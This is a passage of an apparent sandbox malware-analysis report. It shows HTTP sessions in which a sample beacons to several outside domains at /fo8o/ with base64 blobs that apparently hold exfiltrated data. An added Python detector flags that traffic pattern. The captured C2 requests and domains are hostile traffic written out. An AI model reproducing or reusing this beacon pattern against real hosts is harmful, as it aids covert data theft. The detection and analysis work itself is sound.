                                                                              Data Ascii: -header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window
                                                                              Nov 21, 2024 12:55:43.312654972 CET | 1097 | IN | Data Raw: 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66
                                                                              Data Ascii: :medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}
                                                                              Nov 21, 2024 12:55:43.433368921 CET | 1236 | IN | Data Raw: 35 37 36 0d 0a 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 0a 0a 20 20 20
                                                                              Data Ascii: 576oter{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":
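Sessions 8 to 13 show one request shape sent to three unrelated hosts: the same short single-directory path (/fo8o/), the same form or query field name (SHqP-p) carrying an unencoded base64 blob (120 characters in the GETs, 196 or 10296 in the POSTs), the same fixed MSIE 8.0 User-Agent, and on the POSTs a Referer equal to the request URL itself, while the hosts answer with a 504, a 405 from a parking server, or a parked 200 page. The Python below is an added example for this report, not Joe Sandbox output and not code from the sample: it turns those observations into a per-request indicator check, a host-rotation report and a response classifier. The four request lines, hosts and payloads are copied from sessions 8, 9, 12 and 13 above (with the header set reduced to what the detector reads); the benign request and the shortened responses are constructed; the indicator threshold and minimum payload length are assumptions of the example.

```python
import re
from collections import defaultdict

# Every request in the capture carries this exact, long-obsolete User-Agent string.
MSIE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
            ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
            "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")
RAW_B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MIN_PAYLOAD = 100    # assumption of this example: shortest value treated as a beacon blob
MIN_INDICATORS = 3   # assumption of this example: indicators needed to flag one request

def split_pairs(s):
    """Split k=v&k=v WITHOUT percent/plus decoding. The blobs are raw base64 in which '+'
    and '/' matter, so urllib.parse.parse_qsl (which maps '+' to a space) would corrupt them."""
    pairs = {}
    for part in (s.split("&") if s else []):
        key, _, value = part.partition("=")
        pairs[key] = value
    return pairs

def parse_headers(lines):  # lower-cased names: the capture mixes header case
    return {n.strip().lower(): v.strip() for n, _, v in (ln.partition(":") for ln in lines)}

def parse_request(raw):
    """Raw HTTP/1.x request -> method, path, query fields, headers, body fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": split_pairs(query),
            "headers": parse_headers(lines[1:]), "body": split_pairs(body)}

def is_raw_base64(value):  # unencoded, correctly padded base64 of at least MIN_PAYLOAD chars
    return len(value) >= MIN_PAYLOAD and len(value) % 4 == 0 and bool(RAW_B64.fullmatch(value))

def beacon_indicators(req):
    """Indicators one request satisfies; an empty list means nothing matched."""
    h, hits = req["headers"], []
    params = req["body"] if req["method"] == "POST" else req["query"]
    blobs = [k for k, v in params.items() if is_raw_base64(v)]
    if h.get("user-agent") == MSIE8_UA:
        hits.append("fixed MSIE 8.0 User-Agent")
    if re.fullmatch(r"/[a-z0-9]{3,6}/", req["path"]):
        hits.append("short single-directory path")
    if req["method"] == "POST":
        if h.get("content-type") == "application/x-www-form-urlencoded" and len(params) == 1 and blobs:
            hits.append("single raw-base64 form field")
        if h.get("referer") == f"http://{h.get('host')}{req['path']}":
            hits.append("Referer equals the request URL itself")
    elif blobs and len(params) == 2:
        hits.append("GET with one raw-base64 field plus one short tag")
    return hits

def is_beacon(req): return len(beacon_indicators(req)) >= MIN_INDICATORS

def rotation_report(reqs):
    """(path, field) -> hosts it went to; one path and field across unrelated domains is the rotation above."""
    groups = defaultdict(set)
    for r in reqs:
        params = r["body"] if r["method"] == "POST" else r["query"]
        for k, v in params.items():
            if is_raw_base64(v):
                groups[(r["path"], k)].add(r["headers"].get("host", ""))
    return {key: sorted(hosts) for key, hosts in groups.items()}

def classify_response(raw):
    """A 200 served by 'server: Parking/1.0' (session 12) is parked, not a live panel."""
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    if parse_headers(lines[1:]).get("server", "").startswith("Parking/"):
        return "parked"
    return "unreachable" if status in (502, 503, 504) else "live" if status == 200 else "other"

def captured(method, target, host, body=""):
    """Rebuild a request from the capture with the header subset the detector reads."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", f"User-Agent: {MSIE8_UA}", "Connection: close"]
    if body:
        lines += [f"Origin: http://{host}", "Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}", f"Referer: http://{host}{target}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

# Request lines, hosts and payloads copied from sessions 8, 9, 12 and 13 above.
SAMPLE_REQUESTS = [
    captured("GET", "/fo8o/?0xilO=7vZpwBG&SHqP-p=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=", "www.magmadokum.com"),
    captured("POST", "/fo8o/", "www.rssnewscast.com", "SHqP-p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg=="),
    captured("GET", "/fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG", "www.rssnewscast.com"),
    captured("POST", "/fo8o/", "www.techchains.info", "SHqP-p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ=="),
]
# Constructed negative control (not from the capture): an ordinary form login.
BENIGN_REQUEST = "\r\n".join(["POST /login HTTP/1.1", "Host: example.test",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0",
    "Content-Type: application/x-www-form-urlencoded", "Referer: https://example.test/", "", "user=alice&pass=s3cret"])
# Status lines and headers from sessions 12 and 8; bodies shortened.
PARKED_200 = "\r\n".join(["HTTP/1.1 200 OK", "content-type: text/html; charset=UTF-8", "server: Parking/1.0", "connection: close", "", "<!DOCTYPE html>"])
TIMEOUT_504 = "\r\n".join(["HTTP/1.0 504 Gateway Time-out", "Connection: close", "Content-Type: text/html", "", "<h1>504 Gateway Time-out</h1>"])

if __name__ == "__main__":
    reqs = list(map(parse_request, SAMPLE_REQUESTS))
    print([is_beacon(r) for r in reqs], is_beacon(parse_request(BENIGN_REQUEST)), rotation_report(reqs))
```

Two details matter when porting this to a real proxy or IDS log: the field values must be taken from the raw request without form decoding, because the sample does not percent-encode its base64 and a decoder would turn every '+' into a space before the shape check runs; and the host list from rotation_report is the signal, not the response codes, since the hosts contacted here answered with a 504, with 405s from a parking service and with a parked 200, so a successful-looking status from one of them says nothing about whether that domain is the live panel.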


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.4 | 50015 | 66.29.149.46 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:55:57.346892118 CET | 780 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                              Data Ascii: SHqP-p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
Nov 21, 2024 12:55:58.673803091 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:55:58 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50016 | 66.29.149.46 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:00.007350922 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                              Data Ascii: SHqP-p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
Nov 21, 2024 12:56:01.298811913 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:01 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50017 | 66.29.149.46 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:02.656513929 CET | 10882 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 [TRUNCATED]
                                                                              Data Ascii: SHqP-p= [TRUNCATED]
Nov 21, 2024 12:56:04.057415962 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:03 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50018 | 66.29.149.46 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:05.312531948 CET | 508 | OUT | GET /fo8o/?SHqP-p=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.techchains.info
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 21, 2024 12:56:06.621342897 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:06 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50019 | 195.110.124.133 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:56:12.102693081 CET | 798 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
Nov 21, 2024 12:56:13.514568090 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:13 GMT
